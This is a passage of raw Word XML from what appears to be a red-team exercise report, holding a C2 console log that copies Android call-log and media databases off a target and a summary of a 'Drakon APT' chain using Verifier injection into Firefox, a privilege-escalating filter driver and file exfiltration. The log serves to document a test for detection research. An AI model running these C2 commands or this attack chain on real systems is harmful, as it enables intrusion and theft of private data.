        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cp /data/data/com.android.providers.contacts/databases/calllog.db                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A8FFB8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cp /data/data/com.android.providers.contacts/databases/calllog.db"                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B672662" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F387736" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls -l /data/local/tmp                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744224F6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls -l /data/local/tmp"                                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890E31C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: total 20971572                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596578D2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rwxrwxrwx 1 root   root          5824 2019-05-17 18:27 a64.ko                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8ED5A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rw------- 1 root   root             0 2019-05-17 19:51 external.db                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116601A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rw------- 1 root   root             0 2019-05-17 19:53 internal.db                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42718715" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rwxrwxrwx 1 root   root         10128 2019-05-17 18:26 msm_g711tlaw.ko                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18580EF7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-rw------- 1 root   root   21474836480 2019-05-15 00:45 swap                                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0542E783" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">drwxrwxrwx 4 system system        4096 2019-05-07 12:50 tc                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B82E88" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDDFC1D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cp /data/data/com.android.providers.media/databases/external.db /data/local/tmp                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D9CCE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cp /data/data/com.android.providers.media/databases/external.db /data/local/tmp"                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15747D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E22973A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls -l /data/local/tmp/external.db                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101098A4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls -l /data/local/tmp/external.db"                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC75C3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: -rw------- 1 root root 0 2019-05-17 19:51 /data/local/tmp/external.db                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FE9DCB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F85A6D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cat /data/local/tmp/external.db                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B1CDBA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cat /data/local/tmp/external.db"                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E5960" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C277492" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cp /data/data/com.android.providers.contacts/databases/calllog.db                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFBD77" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cp /data/data/com.android.providers.contacts/databases/calllog.db"                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71042916" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A92D4D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL cp /data/data/com.android.providers.contacts/databases/calllog.db /data/local/tmp                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403BAF2D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL cp /data/data/com.android.providers.contacts/databases/calllog.db /data/local/tmp"                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBC20C5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68421415" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls -l /data/data/com.android.providers.contacts/databases/calllog.db                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0966C2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls -l /data/data/com.android.providers.contacts/databases/calllog.db"                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8075A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: -rw-rw---- 1 u0_a4 u0_a4 32768 2019-05-07 12:52 /data/data/com.android.providers.contacts/databases/calllog.db       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFEF098" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260DC72" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; SHELL ls -l /data/local/tmp/calllog.db                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F5EA76" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "SHELL ls -l /data/local/tmp/calllog.db"                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30A408" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied: -rw------- 1 root root 0 2019-05-17 19:56 /data/local/tmp/calllog.db                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11A7B8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565BE508" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt;      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6E3DAC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0640BA31" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33A0F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; quit                                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B25820" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending "quit"                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBB956" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">client replied:                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB2027B" w14:textId="719102DC" w:rsidR="005A0BE6" w:rsidRPr="00650FDF" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C2&gt; QUIT  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEE1923" w14:textId="41C5652B" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="_Toc12600145"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>16:11 -- FiveDirections 1 -- Verifier Drakon APT FileFilter-Elevate (Cont)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
    </w:p>
    <w:p w14:paraId="654730D9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>A previous attack setup Drakon to run everytime Firefox is started using the Verifier process injection technique.  This attack picked up from there, using a C2 connection that resulted from starting Firefox that launched Drakon.  The attacker used the new elevate driver to gain SYSTEM privileges. The elevate driver was triggered by trying to open a specific filename which did not exist.  The attacker then exfil’ed the host file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729EC90" w14:textId="3C1B710C" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="_uh9zhooiiugx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="259" w:name="_Toc12600146"/>
      <w:bookmarkEnd w:id="258"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
    </w:p>
    <w:p w14:paraId="1E655A8F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-fivedirections-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.55</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314FD85F" w14:textId="75984F59" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="_80ftcufvrvs6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="261" w:name="_Toc12600147"/>
      <w:bookmarkEnd w:id="260"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="261"/>
    </w:p>
    <w:p w14:paraId="5F2C85BB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Verifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A13533D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Drakon APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DEEFA9" w14:textId="09400267" w:rsidR="00A351B2" w:rsidRPr="00650FDF" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>FileFilter-Elevate Driver (File System Filter Driver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F451AA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="262" w:name="_Toc12600148"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="262"/>
    </w:p>
    <w:p w14:paraId="1CEDAACC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE04E3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/oc2_5d$ date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE5BD1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Fri May 17 16:11:02 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA55B95" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:/e5/oc2_5d$ python ocMain.py --http 8110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B74A3C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A790E0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DBA3E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128EA056" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9C57C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:8110  [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0009C90B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127257CE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479F4524" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442C4C44" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72769A53" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B693F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [W1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD182E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7397E322" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;co</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F17BED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2BEE37" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E99E2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F424E24" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new windows console</w:t>
      </w:r>
    </w:p>
